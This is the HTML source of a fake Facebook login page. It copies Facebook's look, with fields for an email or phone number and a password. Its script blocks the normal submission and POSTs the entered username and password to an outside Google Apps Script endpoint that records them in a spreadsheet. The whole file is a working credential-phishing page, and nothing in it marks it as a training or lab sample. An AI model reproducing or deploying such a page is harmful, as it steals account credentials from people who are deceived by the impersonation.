<!DOCTYPE html>
<html>
<head>
    <title>Login Facebook</title>
    <style>
        /* Bordered form */
        form {
          background: #edf5ff;
            
            max-width: 100%;
            height: 1873px;
            margin: auto;
            padding: 20px;
        }

        /* Full-width inputs */
        input[type=text], input[type=password] {
            width: 100%;
            height: 150px;
            padding: 24px;
            margin: 16px 0;
            border: 3px solid #ccc;
            box-sizing: border-box;
            border-radius: 20px;
            font-size: 45px;
        }

        /* Set a style for the login button */
        button.login-btn {
            background-color: #1877F2;
            color: white;
            border: none;
            padding: 10px 20px;
            cursor: pointer;
            width: 100%;
	    height: 100px;
            font-size: 45px;
            border-radius: 50px;
        }

        /* Add a hover effect for the login button */
        button.login-btn:hover {
            opacity: 0.8;
        }

        /* Center the avatar image inside this container */
        .imgcontainer {
            text-align: center;
            margin-top: 200px;
            margin-bottom: 280px;
        }

        /* Avatar image */
        img.avatar {
            width: 150px;
            border-radius: 50%;
        }

        /* Add padding to containers */
        .container {
            padding: 0px;
        }

        /* The "Forgot password" text */
        span.psw {
            float: right;
            
        }
        .container p{
          text-align: center;
           margin-bottom: 480px;
	   font-size: 45px;
           

        }
        .emo{
            background-color: #edf5ff;
            
            border: 1px solid #ccc;
            cursor: pointer;
            width: 100%;
            padding: 10px 20px;
            border-radius: 50px;
            font-size: 45px;
            height: 100px;
            border: 3px solid #ccc;
        }
    </style>
</head>
<body>
    <form name="submit-to-google-sheet">
        <div class="imgcontainer">
            <img src="https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcQiXN9xSEe8unzPBEQOeAKXd9Q55efGHGB9BA&s" alt="Avatar" class="avatar">
        </div>
        <div class="container">
            
            <input type="text" placeholder="Mobile number or email address" name="uname" required>
            
            <input type="password" placeholder="Password" name="psw" required>
            <button type="submit" name="submit" class="login-btn">Login</button>
           
        </div>
        <div class="container">
            
           <p><a href="#">Forgot password?</a></p>
        </div>
        
          <button class="emo">Create new account</button>
     	
  <span id="success"></span><br>
</form>


<script>
  const scriptURL = 'https://script.google.com/macros/s/AKfycbzjO2JoB8xKgMk9inLbiqsC6HtS5UB2s8o3QUopiw1Iuvu-uA6xi0DdnMnCcwSW2zhs/exec'
  const form = document.forms['submit-to-google-sheet']

  form.addEventListener('submit', e => {
    e.preventDefault()
    fetch(scriptURL, { method: 'POST', body: new FormData(form)})
      .then(response => console.log('Success!', response))
      .catch(error => console.error('Error!', error.message))
  })
</script>

</body>
</html>